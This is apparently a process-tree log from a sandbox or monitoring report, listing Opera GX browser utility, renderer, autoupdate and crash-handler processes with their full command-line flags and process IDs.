C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6012,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5808 /prefetch:82⤵PID:7648
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6328,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6376 /prefetch:12⤵PID:5204
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6076,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5744 /prefetch:82⤵PID:808
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6164,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:82⤵PID:3360
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6800,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6824 /prefetch:82⤵PID:5648
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6796,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6840 /prefetch:82⤵PID:4944
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6792,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7092 /prefetch:82⤵PID:5444
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6936,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7276 /prefetch:82⤵PID:6204
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7000,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7432 /prefetch:82⤵PID:6516
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6784,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7460 /prefetch:82⤵PID:5732
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6772,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7608 /prefetch:82⤵PID:4232
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6748,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7868 /prefetch:82⤵PID:5124
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7144,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7904 /prefetch:82⤵PID:4228
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7256,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8184 /prefetch:82⤵PID:6712
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8340,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8336 /prefetch:82⤵PID:6644
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8520,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8516 /prefetch:82⤵PID:6724
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8644,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8656 /prefetch:82⤵PID:3668
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --user-data-dir="C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable" --pipeid=oauc_pipebbf75761f34e48ef16427d916ed763c82⤵PID:7880
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ff60529f8f4,0x7ff60529f900,0x7ff60529f9103⤵PID:5000
-
-
-
